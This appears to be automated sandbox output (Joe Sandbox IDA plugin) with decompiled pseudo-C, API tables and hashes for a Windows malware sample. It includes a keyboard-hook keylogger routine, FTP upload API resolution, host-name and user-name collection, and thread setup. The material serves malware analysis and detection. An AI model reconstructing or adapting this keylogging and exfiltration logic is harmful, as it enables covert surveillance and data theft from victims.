                                                                                                                                      							_t391 = _t391 + 0x18;
                                                                                                                                      							_t253 = 0;
                                                                                                                                      							__eflags = 0;
                                                                                                                                      						}
                                                                                                                                      						_push(_t286);
                                                                                                                                      						_t287 = E01305ED4();
                                                                                                                                      						__eflags =  *((char*)(E01304C36(_t101, __eflags, _t286)));
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							 *0x132f8d0 = 1;
                                                                                                                                      							E01305E77(_t287, _t364);
                                                                                                                                      						}
                                                                                                                                      						_t392 = _t391 - 0x1c;
                                                                                                                                      						_t375 = _t392;
                                                                                                                                      						E0130296E(_t375, _t364, __eflags, E01304C09(_t364, _t392, _t382, __eflags, 1));
                                                                                                                                      						_t365 = E0130282E(E013075D8( &_v60, __eflags), __eflags);
                                                                                                                                      						E013061D6(_t105, _t106, _t375);
                                                                                                                                      						_t393 = _t392 + 0x20;
                                                                                                                                      						E013028AF( &_v60, _t106, __eflags);
                                                                                                                                      						_t292 = E01304C09(_t106, _t375, _t382, __eflags, _t253);
                                                                                                                                      						__eflags =  *((char*)(E01304C36(_t109, __eflags,  &_v60))) - 1;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							_v141 =  *((intOrPtr*)(E01304C36(E01304C09(_t365, _t375, _t382, __eflags, 4), __eflags, _t292)));
                                                                                                                                      							_v150 =  *((intOrPtr*)(E01304C36(E01304C09(_t365, _t375, _t382, __eflags, 0xd), __eflags, _t190)));
                                                                                                                                      							E0130282E(E01304C09(_t365, _t375, _t382, __eflags, 0xb), __eflags);
                                                                                                                                      							_t258 =  *((intOrPtr*)(E0130282E(E01304C09(_t365, _t375, _t382, __eflags, 0xa), __eflags)));
                                                                                                                                      							_v164 =  *((intOrPtr*)(E01304C36(E01304C09(_t365, _t375, _t382, __eflags, 5), __eflags, _t198)));
                                                                                                                                      							_t204 = E01304C36(E01304C09(_t365, _t375, _t382, __eflags, 2), __eflags, _t200);
                                                                                                                                      							_t393 = _t393 - 0x18;
                                                                                                                                      							_t375 = _t393;
                                                                                                                                      							E0130296E(_t393, _t365, __eflags, E01304C09(_t365, _t393, _t382, __eflags, 0xc));
                                                                                                                                      							_push(_v181);
                                                                                                                                      							_push(_v182);
                                                                                                                                      							_push(_t258);
                                                                                                                                      							_t210 = E0130282E(E01304C09(_t365, _t393, _t382, __eflags, 3), __eflags);
                                                                                                                                      							_push(_t210);
                                                                                                                                      							__eflags = _t258;
                                                                                                                                      							_push((_t210 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff);
                                                                                                                                      							_push(E01311AD3(_t213, E0130282E(E01304C09(_t365, _t375, _t382, __eflags, 9), __eflags)));
                                                                                                                                      							_push(E0130282E(E01304C09(_t365, _t375, _t382, __eflags, 7), __eflags));
                                                                                                                                      							_t292 = E01304C09(_t365, _t375, _t382, __eflags, 6);
                                                                                                                                      							_push(E0130282E(_t218, __eflags));
                                                                                                                                      							_push(_v196);
                                                                                                                                      							_push( *_t204 & 0x000000ff); // executed
                                                                                                                                      							E0130127A(_t218, _t365, _t204, __eflags); // executed
                                                                                                                                      							_t253 = 0;
                                                                                                                                      							__eflags = 0;
                                                                                                                                      						}
                                                                                                                                      						_t293 = E01304C09(_t365, _t375, _t382, __eflags, 0xe);
                                                                                                                                      						_t112 = E01304C36(_t111, __eflags, _t292);
                                                                                                                                      						_t368 = CreateThread;
                                                                                                                                      						_t383 = E01306B41;
                                                                                                                                      						__eflags =  *_t112 - 1;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							_t167 = E01309967(_t253, _t293, _t365, CreateThread, _t375, __eflags);
                                                                                                                                      							L20();
                                                                                                                                      							_t375 = _t167;
                                                                                                                                      							 *_t375 = _t253;
                                                                                                                                      							 *((intOrPtr*)(_t375 + 0x34)) = E01311AD3(_t168, E0130282E(E01304C09(_t365, _t375, E01306B41, __eflags, 0x10), __eflags));
                                                                                                                                      							 *((intOrPtr*)(_t375 + 0x38)) = E01311AD3(_t171, E0130282E(E01304C09(_t365, _t375, E01306B41, __eflags, 0x11), __eflags));
                                                                                                                                      							 *((char*)(_t375 + 1)) = 1;
                                                                                                                                      							 *((char*)(_t375 + 2)) =  *((intOrPtr*)(E01304C36(E01304C09(_t365, _t375, E01306B41, __eflags, 0x14), __eflags, 0x44)));
                                                                                                                                      							_t178 = E0130282E(E01304C09(_t365, _t375, E01306B41, __eflags, 0x15), __eflags);
                                                                                                                                      							_t44 = _t375 + 4; // 0x4
                                                                                                                                      							E01302723(_t44, _t178);
                                                                                                                                      							_t181 = E0130282E(E01304C09(_t365, _t375, E01306B41, __eflags, 0x12), __eflags);
                                                                                                                                      							_t45 = _t375 + 0x1c; // 0x1c
                                                                                                                                      							E01302723(_t45, _t181);
                                                                                                                                      							 *((intOrPtr*)(_t375 + 0x3c)) = E01311AD3(_t183, E0130282E(E01304C09(_t365, _t375, E01306B41, __eflags, 0x2d), __eflags));
                                                                                                                                      							_t293 = E01304C09(_t365, _t375, E01306B41, __eflags, 0xd);
                                                                                                                                      							_t187 = E01304C36(_t186, __eflags);
                                                                                                                                      							__eflags =  *_t187;
                                                                                                                                      							_t48 =  *_t187 != 0;
                                                                                                                                      							__eflags = _t48;
                                                                                                                                      							 *((char*)(_t375 + 0x40)) = _t187 & 0xffffff00 | _t48;
                                                                                                                                      							CreateThread(_t253, _t253, E01306B41, _t375, _t253, _t253);
                                                                                                                                      						}
                                                                                                                                      						_t294 = E01304C09(_t365, _t375, _t383, __eflags, 0xf);
                                                                                                                                      						__eflags =  *((char*)(E01304C36(_t113, __eflags, _t293))) - 1;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							_t144 = E01309967(_t253, _t294, _t365, _t368, _t375, __eflags);
                                                                                                                                      							L20();
                                                                                                                                      							_t375 = _t144;
                                                                                                                                      							 *_t375 = 1;
                                                                                                                                      							 *((intOrPtr*)(_t375 + 0x34)) = E01311AD3(_t145, E0130282E(E01304C09(_t365, _t375, _t383, __eflags, 0x10), __eflags));
                                                                                                                                      							 *((intOrPtr*)(_t375 + 0x38)) = E01311AD3(_t148, E0130282E(E01304C09(_t365, _t375, _t383, __eflags, 0x11), __eflags));
                                                                                                                                      							 *((char*)(_t375 + 1)) = 1;
                                                                                                                                      							 *((char*)(_t375 + 2)) =  *((intOrPtr*)(E01304C36(E01304C09(_t365, _t375, _t383, __eflags, 0x14), __eflags, 0x44)));
                                                                                                                                      							_t155 = E0130282E(E01304C09(_t365, _t375, _t383, __eflags, 0x15), __eflags);
                                                                                                                                      							_t54 = _t375 + 4; // 0x4
                                                                                                                                      							E01302723(_t54, _t155);
                                                                                                                                      							_t158 = E0130282E(E01304C09(_t365, _t375, _t383, __eflags, 0x12), __eflags);
                                                                                                                                      							_t55 = _t375 + 0x1c; // 0x1c
                                                                                                                                      							E01302723(_t55, _t158);
                                                                                                                                      							 *((intOrPtr*)(_t375 + 0x3c)) = E01311AD3(_t160, E0130282E(E01304C09(_t365, _t375, _t383, __eflags, 0x2d), __eflags));
                                                                                                                                      							_t164 = E01304C36(E01304C09(_t365, _t375, _t383, __eflags, 0xd), __eflags);
                                                                                                                                      							__eflags =  *_t164;
                                                                                                                                      							_t58 =  *_t164 != 0;
                                                                                                                                      							__eflags = _t58;
                                                                                                                                      							 *((char*)(_t375 + 0x40)) = _t164 & 0xffffff00 | _t58;
                                                                                                                                      							CreateThread(_t253, _t253, _t383, _t375, _t253, _t253); // executed
                                                                                                                                      						}
                                                                                                                                      						CreateThread(_t253, _t253, E013052DD, _t253, _t253, _t253); // executed
                                                                                                                                      						__eflags =  *((char*)(E0130282E(E01304C09(_t365, _t375, _t383, __eflags, 0x16), __eflags)));
                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                      							L19:
                                                                                                                                      							E0130282E(E01304C09(_t365, _t375, _t383, __eflags, 0x22), __eflags);
                                                                                                                                      							_t121 = E0130282E(E01304C09(_t365, _t375, _t383, __eflags, 0x21), __eflags);
                                                                                                                                      							_t123 = E0130282E(E01304C09(_t365, _t375, _t383, __eflags, 0x16), __eflags);
                                                                                                                                      							_t376 = _t393 - 0x18;
                                                                                                                                      							E01302917(_t376, _t365, E0130282E(E01304C09(_t365, _t376, _t383, __eflags, 0x24), __eflags));
                                                                                                                                      							_push(E01311AD3(_t127, E0130282E(E01304C09(_t365, _t376, _t383, __eflags, 0x23), __eflags)));
                                                                                                                                      							_t132 = E01311AD3(_t130, E0130282E(E01304C09(_t365, _t376, _t383, __eflags, 0x17), __eflags));
                                                                                                                                      							_t305 =  *_t123;
                                                                                                                                      							_push(_t132);
                                                                                                                                      							_push( *_t121);
                                                                                                                                      							E013042A0(); // executed
                                                                                                                                      							asm("int3");
                                                                                                                                      							_push(_t376);
                                                                                                                                      							_t377 = _t305;
                                                                                                                                      							E01302801(_t377 + 4);
                                                                                                                                      							E01302801(_t377 + 0x1c);
                                                                                                                                      							return _t377;
                                                                                                                                      						} else {
                                                                                                                                      							__eflags =  *((char*)(E0130282E(E01304C09(_t365, _t375, _t383, __eflags, 0x21), __eflags)));
                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                      								goto L19;
                                                                                                                                      							} else {
                                                                                                                                      								__eflags =  *((char*)(E0130282E(E01304C09(_t365, _t375, _t383, __eflags, 0x22), __eflags)));
                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                      									goto L19;
                                                                                                                                      								} else {
                                                                                                                                      									Sleep(0xffffffff);
                                                                                                                                      									E01302755( &_v80, _t365, __eflags);
                                                                                                                                      									E013028AF( &_v104, _t365, __eflags);
                                                                                                                                      									_push(2);
                                                                                                                                      									_pop(1);
                                                                                                                                      									goto L2;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						E01302755( &_v76, _t362, __eflags);
                                                                                                                                      						goto L1;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					L1:
                                                                                                                                      					E013028AF( &_v100, _t362, _t396);
                                                                                                                                      					L2:
                                                                                                                                      					return 1;
                                                                                                                                      				}
                                                                                                                                      			}





































































                                                                                                                                      0x013057e4
                                                                                                                                      0x013057e5
                                                                                                                                      0x013057ea
                                                                                                                                      0x013057f0
                                                                                                                                      0x013057f1
                                                                                                                                      0x013057f2
                                                                                                                                      0x013057f3
                                                                                                                                      0x013057f4
                                                                                                                                      0x013057fd
                                                                                                                                      0x01305806
                                                                                                                                      0x0130580b
                                                                                                                                      0x0130580d
                                                                                                                                      0x01305825
                                                                                                                                      0x0130582f
                                                                                                                                      0x01305834
                                                                                                                                      0x0130583e
                                                                                                                                      0x01305847
                                                                                                                                      0x0130584c
                                                                                                                                      0x01305850
                                                                                                                                      0x01305859
                                                                                                                                      0x01305871
                                                                                                                                      0x0130587a
                                                                                                                                      0x01305882
                                                                                                                                      0x01305885
                                                                                                                                      0x01305891
                                                                                                                                      0x01305896
                                                                                                                                      0x013058aa
                                                                                                                                      0x013058b5
                                                                                                                                      0x013058be
                                                                                                                                      0x013058f3
                                                                                                                                      0x01305905
                                                                                                                                      0x0130590e
                                                                                                                                      0x0130591a
                                                                                                                                      0x01305923
                                                                                                                                      0x01305934
                                                                                                                                      0x01305940
                                                                                                                                      0x01305958
                                                                                                                                      0x0130596e
                                                                                                                                      0x01305978
                                                                                                                                      0x0130597f
                                                                                                                                      0x01305982
                                                                                                                                      0x0130599e
                                                                                                                                      0x013059b5
                                                                                                                                      0x013059c9
                                                                                                                                      0x013059d4
                                                                                                                                      0x013059ec
                                                                                                                                      0x013059fc
                                                                                                                                      0x013059fe
                                                                                                                                      0x01305a03
                                                                                                                                      0x01305a08
                                                                                                                                      0x01305a0c
                                                                                                                                      0x01305a11
                                                                                                                                      0x01305a14
                                                                                                                                      0x01305a18
                                                                                                                                      0x01305a1a
                                                                                                                                      0x01305a1d
                                                                                                                                      0x01305a21
                                                                                                                                      0x01305a23
                                                                                                                                      0x01305a26
                                                                                                                                      0x01305a2d
                                                                                                                                      0x01305a3c
                                                                                                                                      0x01305a46
                                                                                                                                      0x01305a4b
                                                                                                                                      0x01305a4d
                                                                                                                                      0x01305a4f
                                                                                                                                      0x01305a54
                                                                                                                                      0x01305a57
                                                                                                                                      0x01305a57
                                                                                                                                      0x01305a57
                                                                                                                                      0x01305a59
                                                                                                                                      0x01305a60
                                                                                                                                      0x01305a67
                                                                                                                                      0x01305a6a
                                                                                                                                      0x01305a6c
                                                                                                                                      0x01305a76
                                                                                                                                      0x01305a76
                                                                                                                                      0x01305a7b
                                                                                                                                      0x01305a7e
                                                                                                                                      0x01305a8a
                                                                                                                                      0x01305aa3
                                                                                                                                      0x01305aa5
                                                                                                                                      0x01305aaa
                                                                                                                                      0x01305ab1
                                                                                                                                      0x01305abd
                                                                                                                                      0x01305ac4
                                                                                                                                      0x01305ac7
                                                                                                                                      0x01305ae1
                                                                                                                                      0x01305af5
                                                                                                                                      0x01305b00
                                                                                                                                      0x01305b18
                                                                                                                                      0x01305b2b
                                                                                                                                      0x01305b36
                                                                                                                                      0x01305b3b
                                                                                                                                      0x01305b40
                                                                                                                                      0x01305b4c
                                                                                                                                      0x01305b5b
                                                                                                                                      0x01305b5c
                                                                                                                                      0x01305b60
                                                                                                                                      0x01305b6a
                                                                                                                                      0x01305b6f
                                                                                                                                      0x01305b70
                                                                                                                                      0x01305b78
                                                                                                                                      0x01305b8e
                                                                                                                                      0x01305b9d
                                                                                                                                      0x01305ba5
                                                                                                                                      0x01305bac
                                                                                                                                      0x01305bad
                                                                                                                                      0x01305bb4
                                                                                                                                      0x01305bb5
                                                                                                                                      0x01305bba
                                                                                                                                      0x01305bba
                                                                                                                                      0x01305bba
                                                                                                                                      0x01305bc4
                                                                                                                                      0x01305bc6
                                                                                                                                      0x01305bcb
                                                                                                                                      0x01305bd1
                                                                                                                                      0x01305bd6
                                                                                                                                      0x01305bd9
                                                                                                                                      0x01305be1
                                                                                                                                      0x01305be9
                                                                                                                                      0x01305bee
                                                                                                                                      0x01305bf2
                                                                                                                                      0x01305c09
                                                                                                                                      0x01305c20
                                                                                                                                      0x01305c23
                                                                                                                                      0x01305c37
                                                                                                                                      0x01305c41
                                                                                                                                      0x01305c47
                                                                                                                                      0x01305c4a
                                                                                                                                      0x01305c58
                                                                                                                                      0x01305c5e
                                                                                                                                      0x01305c61
                                                                                                                                      0x01305c7c
                                                                                                                                      0x01305c84
                                                                                                                                      0x01305c86
                                                                                                                                      0x01305c8e
                                                                                                                                      0x01305c93
                                                                                                                                      0x01305c93
                                                                                                                                      0x01305c97
                                                                                                                                      0x01305c9a
                                                                                                                                      0x01305c9a
                                                                                                                                      0x01305ca4
                                                                                                                                      0x01305cab
                                                                                                                                      0x01305cae
                                                                                                                                      0x01305cb6
                                                                                                                                      0x01305cbe
                                                                                                                                      0x01305cc3
                                                                                                                                      0x01305cc7
                                                                                                                                      0x01305cdf
                                                                                                                                      0x01305cf6
                                                                                                                                      0x01305cf9
                                                                                                                                      0x01305d0d
                                                                                                                                      0x01305d17
                                                                                                                                      0x01305d1d
                                                                                                                                      0x01305d20
                                                                                                                                      0x01305d2e
                                                                                                                                      0x01305d34
                                                                                                                                      0x01305d37
                                                                                                                                      0x01305d52
                                                                                                                                      0x01305d5c
                                                                                                                                      0x01305d64
                                                                                                                                      0x01305d69
                                                                                                                                      0x01305d69
                                                                                                                                      0x01305d6d
                                                                                                                                      0x01305d70
                                                                                                                                      0x01305d70
                                                                                                                                      0x01305d7c
                                                                                                                                      0x01305d8c
                                                                                                                                      0x01305d8f
                                                                                                                                      0x01305dd9
                                                                                                                                      0x01305de2
                                                                                                                                      0x01305df2
                                                                                                                                      0x01305e02
                                                                                                                                      0x01305e0c
                                                                                                                                      0x01305e1f
                                                                                                                                      0x01305e39
                                                                                                                                      0x01305e49
                                                                                                                                      0x01305e4f
                                                                                                                                      0x01305e52
                                                                                                                                      0x01305e56
                                                                                                                                      0x01305e5a
                                                                                                                                      0x01305e5f
                                                                                                                                      0x01305e60
                                                                                                                                      0x01305e61
                                                                                                                                      0x01305e66
                                                                                                                                      0x01305e6e
                                                                                                                                      0x01305e76
                                                                                                                                      0x01305d91
                                                                                                                                      0x01305d9f
                                                                                                                                      0x01305da2
                                                                                                                                      0x00000000
                                                                                                                                      0x01305da4
                                                                                                                                      0x01305db2
                                                                                                                                      0x01305db5
                                                                                                                                      0x00000000
                                                                                                                                      0x01305db7
                                                                                                                                      0x01305db9
                                                                                                                                      0x01305dc3
                                                                                                                                      0x01305dcc
                                                                                                                                      0x01305dd1
                                                                                                                                      0x01305dd3
                                                                                                                                      0x00000000
                                                                                                                                      0x01305dd3
                                                                                                                                      0x01305db5
                                                                                                                                      0x01305da2
                                                                                                                                      0x01305898
                                                                                                                                      0x0130589c
                                                                                                                                      0x00000000
                                                                                                                                      0x0130589c
                                                                                                                                      0x0130580f
                                                                                                                                      0x0130580f
                                                                                                                                      0x01305813
                                                                                                                                      0x0130581b
                                                                                                                                      0x01305822
                                                                                                                                      0x01305822

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 01306EAD: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,013057F9), ref: 01306EBA
                                                                                                                                        • Part of subcall function 01306EAD: GetProcAddress.KERNEL32(00000000), ref: 01306EC7
                                                                                                                                        • Part of subcall function 01306EAD: LoadLibraryA.KERNELBASE(Shlwapi.dll,0000000C,?,?,?,013057F9), ref: 01306EDC
                                                                                                                                        • Part of subcall function 01306EAD: GetProcAddress.KERNEL32(00000000), ref: 01306EDF
                                                                                                                                        • Part of subcall function 01306EAD: LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo,?,?,?,013057F9), ref: 01306EF0
                                                                                                                                        • Part of subcall function 01306EAD: GetProcAddress.KERNEL32(00000000), ref: 01306EF3
                                                                                                                                        • Part of subcall function 01306EAD: LoadLibraryA.KERNEL32(Shlwapi.dll,PathFileExistsW,?,?,?,013057F9), ref: 01306F00
                                                                                                                                        • Part of subcall function 01306EAD: GetProcAddress.KERNEL32(00000000), ref: 01306F03
                                                                                                                                        • Part of subcall function 01306EAD: LoadLibraryA.KERNELBASE(shell32.dll,ShellExecuteW,?,?,?,013057F9), ref: 01306F14
                                                                                                                                        • Part of subcall function 01306EAD: GetProcAddress.KERNEL32(00000000), ref: 01306F17
                                                                                                                                        • Part of subcall function 01306EAD: LoadLibraryA.KERNELBASE(wininet.dll,FtpPutFileW,?,?,?,013057F9), ref: 01306F29
                                                                                                                                        • Part of subcall function 01306EAD: GetProcAddress.KERNEL32(00000000), ref: 01306F2C
                                                                                                                                        • Part of subcall function 01306EAD: LoadLibraryA.KERNEL32(wininet.dll,InternetOpenW,?,?,?,013057F9), ref: 01306F39
                                                                                                                                        • Part of subcall function 01306EAD: GetProcAddress.KERNEL32(00000000), ref: 01306F3C
                                                                                                                                        • Part of subcall function 01306EAD: LoadLibraryA.KERNEL32(wininet.dll,InternetConnectW,?,?,?,013057F9), ref: 01306F49
                                                                                                                                        • Part of subcall function 01306EAD: GetProcAddress.KERNEL32(00000000), ref: 01306F4C
                                                                                                                                        • Part of subcall function 01306EAD: LoadLibraryA.KERNEL32(wininet.dll,FtpCreateDirectoryW,?,?,?,013057F9), ref: 01306F59
                                                                                                                                        • Part of subcall function 01306EAD: GetProcAddress.KERNEL32(00000000), ref: 01306F5C
                                                                                                                                        • Part of subcall function 01306EAD: LoadLibraryA.KERNEL32(wininet.dll,InternetCloseHandle,?,?,?,013057F9), ref: 01306F69
                                                                                                                                        • Part of subcall function 01306EAD: GetProcAddress.KERNEL32(00000000), ref: 01306F6C
                                                                                                                                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,00000013,00000000), ref: 01305885
                                                                                                                                      • GetLastError.KERNEL32 ref: 0130588B
                                                                                                                                        • Part of subcall function 01307C21: __EH_prolog.LIBCMT ref: 01307C26
                                                                                                                                        • Part of subcall function 01307C21: GetComputerNameExW.KERNEL32(00000001,?,?), ref: 01307C48
                                                                                                                                        • Part of subcall function 01307C21: GetUserNameW.ADVAPI32(?,?), ref: 01307C60
                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe,00000104,00000000,00000013,01329C08,00000000), ref: 01305934
                                                                                                                                        • Part of subcall function 01304DC5: __EH_prolog.LIBCMT ref: 01304DCA
                                                                                                                                        • Part of subcall function 01304DC5: _wcslen.LIBCMT ref: 01304DE0
                                                                                                                                        • Part of subcall function 01304DC5: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0132F930,00000000,00000000), ref: 01304E15
                                                                                                                                        • Part of subcall function 0130127A: __EH_prolog.LIBCMT ref: 0130127F
                                                                                                                                        • Part of subcall function 0130127A: _wcslen.LIBCMT ref: 013012C9
                                                                                                                                      • CreateThread.KERNEL32 ref: 01305C9A
                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00006B41,00000000,00000000,00000000), ref: 01305D70
                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000052DD,00000000,00000000,00000000), ref: 01305D7C
                                                                                                                                      • Sleep.KERNEL32(000000FF,00000022,00000021,00000016,?,0000000E,?,00000000), ref: 01305DB9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$LibraryLoad$Create$H_prologNameThread$Module_wcslen$ComputerDirectoryErrorFileHandleLastMutexSleepUser
                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe$Software\
                                                                                                                                      • API String ID: 2880972920-3600987075
                                                                                                                                      • Opcode ID: 582db22d070cd04f8e356a3f0d24d152fa445368cfc3b588d6f89e9da00c9d60
                                                                                                                                      • Instruction ID: d57a9ac97a60472c84567bac5bc1edf23900bd472f7406b2f6bae6b917cc6984
                                                                                                                                      • Opcode Fuzzy Hash: 582db22d070cd04f8e356a3f0d24d152fa445368cfc3b588d6f89e9da00c9d60
                                                                                                                                      • Instruction Fuzzy Hash: 25F1D4A4B043467EEE17B7BC9C79B6F2AD98F75608F10042DF281AB1D2FD799A044361
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                      			E013014E8(struct HHOOK__** __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				int _t15;
                                                                                                                                      				void* _t16;
                                                                                                                                      				struct HHOOK__* _t22;
                                                                                                                                      				void* _t24;
                                                                                                                                      				struct HHOOK__** _t33;
                                                                                                                                      				struct HHOOK__** _t43;
                                                                                                                                      				void* _t45;
                                                                                                                                      				void* _t47;
                                                                                                                                      				void* _t48;
                                                                                                                                      
                                                                                                                                      				_t33 = __ecx;
                                                                                                                                      				E01323174(E013231D8, __edx, __eflags);
                                                                                                                                      				_t48 = _t47 - 0x3c;
                                                                                                                                      				_t43 = _t33;
                                                                                                                                      				 *0x132f5b0 = _t43;
                                                                                                                                      				if( *_t43 != 0) {
                                                                                                                                      					goto L3;
                                                                                                                                      				} else {
                                                                                                                                      					_t22 = SetWindowsHookExW(0xd, E013014D4, GetModuleHandleW(0), 0); // executed
                                                                                                                                      					 *_t43 = _t22;
                                                                                                                                      					_t55 = _t22;
                                                                                                                                      					if(_t22 != 0) {
                                                                                                                                      						while(1) {
                                                                                                                                      							L3:
                                                                                                                                      							_t15 = GetMessageW(_t45 - 0x48, 0, 0, 0);
                                                                                                                                      							__eflags = _t15;
                                                                                                                                      							if(_t15 == 0) {
                                                                                                                                      								break;
                                                                                                                                      							}
                                                                                                                                      							TranslateMessage(_t45 - 0x48);
                                                                                                                                      							DispatchMessageW(_t45 - 0x48);
                                                                                                                                      							__eflags =  *_t43;
                                                                                                                                      							if( *_t43 != 0) {
                                                                                                                                      								continue;
                                                                                                                                      							}
                                                                                                                                      							break;
                                                                                                                                      						}
                                                                                                                                      						_t16 = 0;
                                                                                                                                      						__eflags = 0;
                                                                                                                                      					} else {
                                                                                                                                      						_t24 = E01307D38(_t45 - 0x2c, GetLastError());
                                                                                                                                      						_t50 = _t48 - 0x18;
                                                                                                                                      						 *((intOrPtr*)(_t45 - 4)) = 0;
                                                                                                                                      						 *((intOrPtr*)(_t45 - 0x10)) = _t48 - 0x18;
                                                                                                                                      						E01303244(_t48 - 0x18, "Keylogger initialization failure: error ", _t24);
                                                                                                                                      						 *((char*)(_t45 - 4)) = 1;
                                                                                                                                      						E01302917(_t50 - 0x14, "Keylogger initialization failure: error ", "[ERROR]");
                                                                                                                                      						 *((char*)(_t45 - 4)) = 0;
                                                                                                                                      						E01307D70(_t50 - 0x14, "Keylogger initialization failure: error ", _t55);
                                                                                                                                      						E013028AF(_t45 - 0x2c, "Keylogger initialization failure: error ", _t55);
                                                                                                                                      						_t16 = 1;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
                                                                                                                                      				return _t16;
                                                                                                                                      			}












                                                                                                                                      0x013014e8
                                                                                                                                      0x013014ed
                                                                                                                                      0x013014f2
                                                                                                                                      0x013014f7
                                                                                                                                      0x013014fb
                                                                                                                                      0x01301505
                                                                                                                                      0x00000000
                                                                                                                                      0x01301507
                                                                                                                                      0x01301517
                                                                                                                                      0x0130151d
                                                                                                                                      0x0130151f
                                                                                                                                      0x01301521
                                                                                                                                      0x01301574
                                                                                                                                      0x01301574
                                                                                                                                      0x0130157b
                                                                                                                                      0x01301581
                                                                                                                                      0x01301583
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01301589
                                                                                                                                      0x01301593
                                                                                                                                      0x01301599
                                                                                                                                      0x0130159b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0130159b
                                                                                                                                      0x0130159d
                                                                                                                                      0x0130159d
                                                                                                                                      0x01301523
                                                                                                                                      0x0130152e
                                                                                                                                      0x01301533
                                                                                                                                      0x01301536
                                                                                                                                      0x0130153b
                                                                                                                                      0x01301544
                                                                                                                                      0x0130154c
                                                                                                                                      0x01301557
                                                                                                                                      0x0130155c
                                                                                                                                      0x0130155f
                                                                                                                                      0x0130156a
                                                                                                                                      0x01301571
                                                                                                                                      0x01301571
                                                                                                                                      0x01301521
                                                                                                                                      0x013015a3
                                                                                                                                      0x013015ac

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 013014ED
                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 01301509
                                                                                                                                      • SetWindowsHookExW.USER32(0000000D,013014D4,00000000), ref: 01301517
                                                                                                                                      • GetLastError.KERNEL32 ref: 01301523
                                                                                                                                        • Part of subcall function 01307D70: __EH_prolog.LIBCMT ref: 01307D75
                                                                                                                                        • Part of subcall function 01307D70: GetLocalTime.KERNEL32(?), ref: 01307D95
                                                                                                                                      • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0130157B
                                                                                                                                      • TranslateMessage.USER32(?), ref: 01301589
                                                                                                                                      • DispatchMessageW.USER32 ref: 01301593
                                                                                                                                      Strings
                                                                                                                                      • [ERROR], xrefs: 01301552
                                                                                                                                      • Keylogger initialization failure: error , xrefs: 0130153E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Message$H_prolog$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                      • String ID: Keylogger initialization failure: error $[ERROR]
                                                                                                                                      • API String ID: 2498975120-2451335947
                                                                                                                                      • Opcode ID: ade3dbab1a1000fd890a88711679b55311e4a6a92cb6bb780caf4a54c8875f7e
                                                                                                                                      • Instruction ID: 3eaaa93c191b068307315cf8dc17608a122a36759ab199cc43ced6ded9654f8b
                                                                                                                                      • Opcode Fuzzy Hash: ade3dbab1a1000fd890a88711679b55311e4a6a92cb6bb780caf4a54c8875f7e
                                                                                                                                      • Instruction Fuzzy Hash: 87116072E00216ABDB21BFBD98559AEBBFCAF1870CF144419E442E3145EB30DA048761
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

